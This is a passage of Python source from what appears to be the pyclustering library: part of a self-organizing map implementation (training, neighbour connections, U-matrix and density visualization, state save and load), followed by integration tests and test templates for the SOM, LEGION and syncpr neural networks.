self._weights = [[[] for i in range(dim_info.get_dimensions())] for j in range(self._size)]
for i in range(self._size):
location = self._location[i]
for dim in range(dim_info.get_dimensions()):
if dim == 0:
if self._rows > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_x * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif dim == 1:
if self._cols > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_y * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif init_type == type_init.random_surface:
# Random weights at the full surface.
self._weights = [
[random.uniform(dim_info.get_minimum_coordinate()[i], dim_info.get_maximum_coordinate()[i]) for i in
range(dim_info.get_dimensions())] for _ in range(self._size)]
elif init_type == type_init.random_centroid:
# Random weights at the center of input data.
self._weights = [[(random.random() + dim_info.get_center()[i]) for i in range(dim_info.get_dimensions())]
for _ in range(self._size)]
else:
# Random weights of input data.
self._weights = [[random.random() for i in range(dim_info.get_dimensions())] for _ in range(self._size)]
def _create_connections(self, conn_type):
"""!
@brief Create connections in line with input rule (grid four, grid eight, honeycomb, function neighbour).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network.
"""
self._neighbors = [[] for index in range(self._size)]
for index in range(0, self._size, 1):
upper_index = index - self._cols
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols + 1
lower_index = index + self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols + 1
left_index = index - 1
right_index = index + 1
node_row_index = math.floor(index / self._cols)
upper_row_index = node_row_index - 1
lower_row_index = node_row_index + 1
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four):
if upper_index >= 0:
self._neighbors[index].append(upper_index)
if lower_index < self._size:
self._neighbors[index].append(lower_index)
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four) or (
conn_type == type_conn.honeycomb):
if (left_index >= 0) and (math.floor(left_index / self._cols) == node_row_index):
self._neighbors[index].append(left_index)
if (right_index < self._size) and (math.floor(right_index / self._cols) == node_row_index):
self._neighbors[index].append(right_index)
if conn_type == type_conn.grid_eight:
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
if conn_type == type_conn.honeycomb:
if (node_row_index % 2) == 0:
upper_left_index = index - self._cols
upper_right_index = index - self._cols + 1
lower_left_index = index + self._cols
lower_right_index = index + self._cols + 1
else:
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
def _competition(self, x):
"""!
@brief Calculates neuron winner (distance, neuron index).
@param[in] x (list): Input pattern from the input data set, for example it can be coordinates of point.
@return (uint) Returns index of neuron that is winner.
"""
index = 0
minimum = euclidean_distance_square(self._weights[0], x)
for i in range(1, self._size, 1):
candidate = euclidean_distance_square(self._weights[i], x)
if candidate < minimum:
index = i
minimum = candidate
return index
def _adaptation(self, index, x):
"""!
@brief Change weight of neurons in line with won neuron.
@param[in] index (uint): Index of neuron-winner.
@param[in] x (list): Input pattern from the input data set.
"""
dimension = len(self._weights[0])
if self._conn_type == type_conn.func_neighbor:
for neuron_index in range(self._size):
distance = self._sqrt_distances[index][neuron_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neuron_index][i] = self._weights[neuron_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neuron_index][i])
else:
for i in range(dimension):
self._weights[index][i] = self._weights[index][i] + self._learn_rate * (x[i] - self._weights[index][i])
for neighbor_index in self._neighbors[index]:
distance = self._sqrt_distances[index][neighbor_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neighbor_index][i] = self._weights[neighbor_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neighbor_index][i])
def train(self, data, epochs, autostop=False):
"""!
@brief Trains self-organized feature map (SOM).
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
@param[in] autostop (bool): Automatic termination of learning process when adaptation is not occurred.
@return (uint) Number of learning iterations.
"""
self._data = data
if self.__ccore_som_pointer is not None:
return wrapper.som_train(self.__ccore_som_pointer, data, epochs, autostop)
self._sqrt_distances = self.__initialize_distances(self._size, self._location)
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
# weights
self._create_initial_weights(self._params.init_type)
previous_weights = None
for epoch in range(1, epochs + 1):
# Depression term of coupling
self._local_radius = (self._params.init_radius * math.exp(-(epoch / epochs))) ** 2
self._learn_rate = self._params.init_learn_rate * math.exp(-(epoch / epochs))
# Clear statistics
if autostop:
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
for i in range(len(self._data)):
# Step 1: Competition:
index = self._competition(self._data[i])
# Step 2: Adaptation:
self._adaptation(index, self._data[i])
# Update statistics
if (autostop is True) or (epoch == epochs):
self._award[index] += 1
self._capture_objects[index].append(i)
# Check requirement of stopping
if autostop:
if previous_weights is not None:
maximal_adaptation = self._get_maximal_adaptation(previous_weights)
if maximal_adaptation < self._params.adaptation_threshold:
return epoch
previous_weights = [item[:] for item in self._weights]
return epochs
def simulate(self, input_pattern):
"""!
@brief Processes input pattern (no learining) and returns index of neuron-winner.
Using index of neuron winner catched object can be obtained using property capture_objects.
@param[in] input_pattern (list): Input pattern.
@return (uint) Returns index of neuron-winner.
@see capture_objects
"""
if self.__ccore_som_pointer is not None:
return wrapper.som_simulate(self.__ccore_som_pointer, input_pattern)
return self._competition(input_pattern)
def _get_maximal_adaptation(self, previous_weights):
"""!
@brief Calculates maximum changes of weight in line with comparison between previous weights and current weights.
@param[in] previous_weights (list): Weights from the previous step of learning process.
@return (double) Value that represents maximum changes of weight after adaptation process.
"""
dimension = len(self._data[0])
maximal_adaptation = 0.0
for neuron_index in range(self._size):
for dim in range(dimension):
current_adaptation = previous_weights[neuron_index][dim] - self._weights[neuron_index][dim]
if current_adaptation < 0:
current_adaptation = -current_adaptation
if maximal_adaptation < current_adaptation:
maximal_adaptation = current_adaptation
return maximal_adaptation
def get_winner_number(self):
"""!
@brief Calculates number of winner at the last step of learning process.
@return (uint) Number of winner.
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
winner_number = 0
for i in range(self._size):
if self._award[i] > 0:
winner_number += 1
return winner_number
def show_distance_matrix(self):
"""!
@brief Shows gray visualization of U-matrix (distance matrix).
@see get_distance_matrix()
"""
distance_matrix = self.get_distance_matrix()
plt.imshow(distance_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("U-Matrix")
plt.colorbar()
plt.show()
def get_distance_matrix(self):
"""!
@brief Calculates distance matrix (U-matrix).
@details The U-Matrix visualizes based on the distance in input space between a weight vector and its neighbors on map.
@return (list) Distance matrix (U-matrix).
@see show_distance_matrix()
@see get_density_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
if self._conn_type != type_conn.func_neighbor:
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
distance_matrix = [[0.0] * self._cols for i in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
if self._conn_type == type_conn.func_neighbor:
self._create_connections(type_conn.grid_eight)
for neighbor_index in self._neighbors[neuron_index]:
distance_matrix[i][j] += euclidean_distance_square(self._weights[neuron_index],
self._weights[neighbor_index])
distance_matrix[i][j] /= len(self._neighbors[neuron_index])
return distance_matrix
def show_density_matrix(self, surface_divider=20.0):
"""!
@brief Show density matrix (P-matrix) using kernel density estimation.
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@see show_distance_matrix()
"""
density_matrix = self.get_density_matrix(surface_divider)
plt.imshow(density_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("P-Matrix")
plt.colorbar()
plt.show()
def get_density_matrix(self, surface_divider=20.0):
"""!
@brief Calculates density matrix (P-Matrix).
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@return (list) Density matrix (P-Matrix).
@see get_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
density_matrix = [[0] * self._cols for i in range(self._rows)]
dimension = len(self._weights[0])
dim_max = [float('-Inf')] * dimension
dim_min = [float('Inf')] * dimension
for weight in self._weights:
for index_dim in range(dimension):
if weight[index_dim] > dim_max[index_dim]:
dim_max[index_dim] = weight[index_dim]
if weight[index_dim] < dim_min[index_dim]:
dim_min[index_dim] = weight[index_dim]
radius = [0.0] * len(self._weights[0])
for index_dim in range(dimension):
radius[index_dim] = (dim_max[index_dim] - dim_min[index_dim]) / surface_divider
## TODO: do not use data
for point in self._data:
for index_neuron in range(len(self)):
point_covered = True
for index_dim in range(dimension):
if abs(point[index_dim] - self._weights[index_neuron][index_dim]) > radius[index_dim]:
point_covered = False
break
row = int(math.floor(index_neuron / self._cols))
col = index_neuron - row * self._cols
if point_covered is True:
density_matrix[row][col] += 1
return density_matrix
def show_winner_matrix(self):
"""!
@brief Show a winner matrix where each element corresponds to neuron and value represents
amount of won objects from input data-space at the last training iteration.
@see show_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
(fig, ax) = plt.subplots()
winner_matrix = [[0] * self._cols for _ in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
winner_matrix[i][j] = self._award[neuron_index]
ax.text(i, j, str(winner_matrix[i][j]), va='center', ha='center')
ax.imshow(winner_matrix, cmap=plt.get_cmap('cool'), interpolation='none')
ax.grid(True)
plt.title("Winner Matrix")
plt.show()
plt.close(fig)
def show_network(self, awards=False, belongs=False, coupling=True, dataset=True, marker_type='o'):
"""!
@brief Shows neurons in the dimension of data.
@param[in] awards (bool): If True - displays how many objects won each neuron.
@param[in] belongs (bool): If True - marks each won object by according index of neuron-winner (only when
dataset is displayed too).
@param[in] coupling (bool): If True - displays connections between neurons (except case when function neighbor
is used).
@param[in] dataset (bool): If True - displays inputs data set.
@param[in] marker_type (string): Defines marker that is used to denote neurons on the plot.
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
dimension = len(self._weights[0])
fig = plt.figure()
# Check for dimensions
if (dimension == 1) or (dimension == 2):
axes = fig.add_subplot(111)
elif dimension == 3:
axes = fig.gca(projection='3d')
else:
raise NotImplementedError('Impossible to show network in data-space that is differ from 1D, 2D or 3D.')
if (self._data is not None) and (dataset is True):
for x in self._data:
if dimension == 1:
axes.plot(x[0], 0.0, 'b|', ms=30)
elif dimension == 2:
axes.plot(x[0], x[1], 'b.')
elif dimension == 3:
axes.scatter(x[0], x[1], x[2], c='b', marker='.')
# Show neurons
for index in range(self._size):
color = 'g'
if self._award[index] == 0:
color = 'y'
if dimension == 1:
axes.plot(self._weights[index][0], 0.0, color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], 0.0, location, color='blue', fontsize=10)
if dimension == 2:
axes.plot(self._weights[index][0], self._weights[index][1], color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], point[1], location, color='blue', fontsize=10)
if (self._conn_type != type_conn.func_neighbor) and (coupling is True):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
'g', linewidth=0.5)
elif dimension == 3:
axes.scatter(self._weights[index][0], self._weights[index][1], self._weights[index][2], c=color,
marker=marker_type)
if (self._conn_type != type_conn.func_neighbor) and (coupling != False):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
[self._weights[index][2], self._weights[neighbor][2]],
'g-', linewidth=0.5)
plt.title("Network Structure")
plt.grid()
plt.show()
plt.close(fig)
def __get_dump_from_python(self, ccore_usage):
return {'ccore': ccore_usage,
'state': {'cols': self._cols,
'rows': self._rows,
'size': self._size,
'conn_type': self._conn_type,
'neighbors': self._neighbors,
'local_radius': self._local_radius,
'learn_rate': self._learn_rate,
'params': self._params,
'location': self._location,
'weights': self._weights,
'award': self._award,
'capture_objects': self._capture_objects}}
def __download_dump_from_ccore(self):
self._location = self.__initialize_locations(self._rows, self._cols)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
def __upload_common_part(self, state_dump):
self._cols = state_dump['cols']
self._rows = state_dump['rows']
self._size = state_dump['size']
self._conn_type = state_dump['conn_type']
self._neighbors = state_dump['neighbors']
self._local_radius = state_dump['local_radius']
self._learn_rate = state_dump['learn_rate']
self._params = state_dump['params']
self._neighbors = None
def __upload_dump_to_python(self, state_dump):
self.__ccore_som_pointer = None
self.__upload_common_part(state_dump)
self._location = state_dump['location']
self._weights = state_dump['weights']
self._award = state_dump['award']
self._capture_objects = state_dump['capture_objects']
self._location = self.__initialize_locations(self._rows, self._cols)
self._create_connections(self._conn_type)
def __upload_dump_to_ccore(self, state_dump):
self.__upload_common_part(state_dump)
self.__ccore_som_pointer = wrapper.som_create(self._rows, self._cols, self._conn_type, self._params)
wrapper.som_load(self.__ccore_som_pointer, state_dump['weights'], state_dump['award'],
state_dump['capture_objects'])
```
#### File: tests/integration/__init__.py
```python
import unittest
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.tests.integration import it_hhn as nnet_hhn_integration_tests
from pyclustering.nnet.tests.integration import it_legion as nnet_legion_integration_tests
from pyclustering.nnet.tests.integration import it_pcnn as nnet_pcnn_integration_tests
from pyclustering.nnet.tests.integration import it_som as nnet_som_integration_tests
from pyclustering.nnet.tests.integration import it_sync as nnet_sync_integration_tests
from pyclustering.nnet.tests.integration import it_syncpr as nnet_syncpr_integration_tests
from pyclustering.nnet.tests.integration import it_syncsegm as nnet_syncsegm_integration_tests
class nnet_integration_tests(suite_holder):
def __init__(self):
super().__init__()
nnet_integration_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(integration_nnet_suite):
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_hhn_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_legion_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_pcnn_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_som_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_sync_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_syncpr_integration_tests))
integration_nnet_suite.addTests(unittest.TestLoader().loadTestsFromModule(nnet_syncsegm_integration_tests))
```
#### File: tests/integration/it_som.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.nnet.tests.som_templates import SomTestTemplates
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.core.tests import remove_library
class SomIntegrationTest(unittest.TestCase):
def testTwoNeuronsTwoClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], False, True)
def testTwoNeuronsTwoClustersByCoreStoreLoad(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True, store_load=True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], False, True, store_load=True)
def testAutostopTwoNeuronsTwoClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], True, True)
def testAutostopTwoNeuronsTwoClustersByCoreStoreLoad(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], True, True, store_load=True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1, 100, [5, 5], True, True, store_load=True)
def testThreeNeuronsThreeClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 3, 100, [5, 8, 10], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1, 100, [5, 8, 10], False, True)
def testAutostopThreeNeuronsThreeClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 3, 100, [5, 8, 10], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1, 100, [5, 8, 10], True, True)
def testFourNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 4, 100, [10, 10, 10, 30], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 2, 100, [10, 10, 10, 30], False, True)
def testAutostopFourNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 4, 100, [10, 10, 10, 30], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 2, 100, [10, 10, 10, 30], True, True)
def testTwoNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 2, 100, [30, 30], False, True)
def testAutostopTwoNeuronsFourClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 2, 100, [30, 30], True, True)
def testSevenNeuronsHeptaClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_HEPTA, 1, 7, 100, [30, 30, 30, 30, 30, 30, 32], False, True)
def testAutostopSevenNeuronsHeptaClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_HEPTA, 1, 7, 100, [30, 30, 30, 30, 30, 30, 32], True, True)
def testFourNeuronsTetraClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TETRA, 1, 4, 100, [100, 100, 100, 100], False, True)
def testAutostopFourNeuronsTetraClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TETRA, 1, 4, 100, [100, 100, 100, 100], True, True)
def testTwoNeuronsTwoDiamondsClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1, 2, 100, [400, 400], False, True)
def testAutostopTwoNeuronsTwoDiamondsClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1, 2, 100, [400, 400], True, True)
def testFiveNeuronsFiveClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 5, 100, [15, 15, 15, 15, 15], False, True)
def testAutostopFiveNeuronsFiveClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 5, 100, [15, 15, 15, 15, 15], True, True)
def testFourNeuronsSquareClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 2, 2, 100, [15, 15, 15, 15], False, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 4, 100, [15, 15, 15, 15], False, True)
def testAutostopFourNeuronsSquareClustersByCore(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 2, 2, 100, [15, 15, 15, 15], True, True)
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 4, 100, [15, 15, 15, 15], True, True)
def testOneDimensionSampleSimple7ClusterByCore(self):
parameters = som_parameters()
parameters.init_type = type_init.random_surface
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1, 100, [10, 10], True, True, parameters)
def testWinnersByCore(self):
SomTestTemplates.templateTestWinners(True)
def testSomVisualizationByCore(self):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
parameters = som_parameters()
network = som(5, 5, type_conn.grid_eight, parameters, ccore = True)
network.train(sample, 100, True)
network.show_network()
network.show_winner_matrix()
network.show_distance_matrix()
network.show_density_matrix()
def testSimulateCheckWinnerFuncNeighborByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.func_neighbor, True)
def testSimulateCheckWinnerFuncNeighborByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.func_neighbor, True, store_load=True)
def testSimulateCheckWinnerGridFourByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_four, True)
def testSimulateCheckWinnerGridFourByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_four, True, store_load=True)
def testSimulateCheckWinnerGridEightByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_eight, True)
def testSimulateCheckWinnerGridEightByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.grid_eight, True, store_load=True)
def testSimulateCheckWinnerHoneycombByCore(self):
SomTestTemplates.templateTestSimulate(type_conn.honeycomb, True)
def testSimulateCheckWinnerHoneycombByCoreStoreLoad(self):
SomTestTemplates.templateTestSimulate(type_conn.honeycomb, True, store_load=True)
def testNetwork2x2RandomState5ByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.honeycomb, 5, True)
def testNetwork2x2RandomState5FuncNeighborByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.func_neighbor, 5, True)
def testNetwork2x2RandomState10ByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.honeycomb, 10, True)
def testNetwork2x2RandomState10FuncNeighborByCore(self):
SomTestTemplates.random_state(2, 2, type_conn.func_neighbor, 10, True)
def testNetwork2x3RandomState5ByCore(self):
SomTestTemplates.random_state(2, 3, type_conn.honeycomb, 5, True)
def testNetwork2x3RandomState10ByCore(self):
SomTestTemplates.random_state(2, 3, type_conn.honeycomb, 10, True)
def testNetwork1x8RandomState5ByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.honeycomb, 5, True)
def testNetwork1x8RandomState10ByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.honeycomb, 10, True)
def testNetwork1x8GridFourByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.grid_four, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.grid_four, 5, True)
def testNetwork1x8GridEightByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.grid_eight, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.grid_eight, 5, True)
def testNetwork1x8FuncNeughborByCore(self):
SomTestTemplates.random_state(1, 8, type_conn.func_neighbor, 5, True)
SomTestTemplates.random_state(8, 1, type_conn.func_neighbor, 5, True)
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
SomTestTemplates.templateTestAwardNeurons(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 2, 100, [5, 5], False, True)
```
#### File: nnet/tests/legion_templates.py
```python
from pyclustering.nnet.legion import legion_network;
from pyclustering.nnet import conn_type;
from pyclustering.utils import extract_number_oscillations;
class LegionTestTemplates:
@staticmethod
def templateOscillationsWithStructures(type_conn, ccore_flag):
net = legion_network(4, type_conn = conn_type.LIST_BIDIR, ccore = ccore_flag);
dynamic = net.simulate(500, 1000, [1, 1, 1, 1]);
for i in range(len(net)):
assert extract_number_oscillations(dynamic.output, i) > 1;
@staticmethod
def templateSyncEnsembleAllocation(stimulus, params, type_conn, sim_steps, sim_time, expected_clusters, ccore_flag):
result_testing = False;
for _ in range(0, 5, 1):
net = legion_network(len(stimulus), params, type_conn, ccore = ccore_flag);
dynamic = net.simulate(sim_steps, sim_time, stimulus);
ensembles = dynamic.allocate_sync_ensembles(0.1);
if (ensembles != expected_clusters):
continue;
result_testing = True;
break;
assert result_testing;
@staticmethod
def templateOutputDynamicInformation(stimulus, params, type_conn, sim_steps, sim_time, ccore_flag):
legion_instance = legion_network(len(stimulus), params, type_conn, ccore = ccore_flag);
dynamic = legion_instance.simulate(sim_steps, sim_time, stimulus);
assert len(dynamic.output) > 0;
assert len(dynamic.inhibitor) > 0;
assert len(dynamic.time) > 0;
```
#### File: nnet/tests/syncpr_templates.py
```python
import matplotlib;
matplotlib.use('Agg');
from pyclustering.nnet import solve_type;
from pyclustering.nnet.syncpr import syncpr, syncpr_visualizer;
class SyncprTestTemplates:
@staticmethod
def templateOutputDynamic(solver, ccore):
net = syncpr(5, 0.1, 0.1, ccore);
output_dynamic = net.simulate(10, 10, [-1, 1, -1, 1, -1], solver, True);
assert len(output_dynamic) == 11; # 10 steps without initial values.
@staticmethod
def templateOutputDynamicLengthStaticSimulation(collect_flag, ccore_flag):
net = syncpr(5, 0.1, 0.1, ccore_flag);
output_dynamic = net.simulate_static(10, 10, [-1, 1, -1, 1, -1], solution = solve_type.FAST, collect_dynamic = collect_flag);
if (collect_flag is True):
assert len(output_dynamic) == 11; # 10 steps without initial values.
else:
assert len(output_dynamic) == 1;
@staticmethod
def templateOutputDynamicLengthDynamicSimulation(collect_flag, ccore_flag):
net = syncpr(5, 0.1, 0.1, ccore_flag);
output_dynamic = net.simulate_dynamic([-1, 1, -1, 1, -1], solution = solve_type.FAST, collect_dynamic = collect_flag);
if (collect_flag is True):
assert len(output_dynamic) > 1;
else:
assert len(output_dynamic) == 1;
@staticmethod
def templateIncorrectPatternForSimulation(pattern, ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore=ccore_flag);
try: net.simulate(10, 10, pattern);
except: return;
assert False;
@staticmethod
def templateTrainNetworkAndRecognizePattern(ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
patterns = [];
patterns += [ [1, 1, 1, 1, 1, -1, -1, -1, -1, -1] ];
patterns += [ [-1, -1, -1, -1, -1, 1, 1, 1, 1, 1] ];
net.train(patterns);
# recognize it
for i in range(len(patterns)):
output_dynamic = net.simulate(10, 10, patterns[i], solve_type.RK4, True);
ensembles = output_dynamic.allocate_sync_ensembles(0.5);
assert len(ensembles) == 2;
assert len(ensembles[0]) == len(ensembles[1]);
# sort results
ensembles[0].sort();
ensembles[1].sort();
assert (ensembles[0] == [0, 1, 2, 3, 4]) or (ensembles[0] == [5, 6, 7, 8, 9]);
assert (ensembles[1] == [0, 1, 2, 3, 4]) or (ensembles[1] == [5, 6, 7, 8, 9]);
@staticmethod
def templateIncorrectPatternForTraining(patterns, ccore_flag):
net = syncpr(10, 0.1, 0.1, ccore_flag);
try: net.train(patterns);
except: return;
assert False;
@staticmethod
def templatePatternVisualizer(collect_dynamic, ccore_flag = False):
net = syncpr(5, 0.1, 0.1, ccore = ccore_flag);
output_dynamic = net.simulate(10, 10, [-1, 1, -1, 1, -1], solve_type.RK4, collect_dynamic);
syncpr_visualizer.show_pattern(output_dynamic, 5, 2);
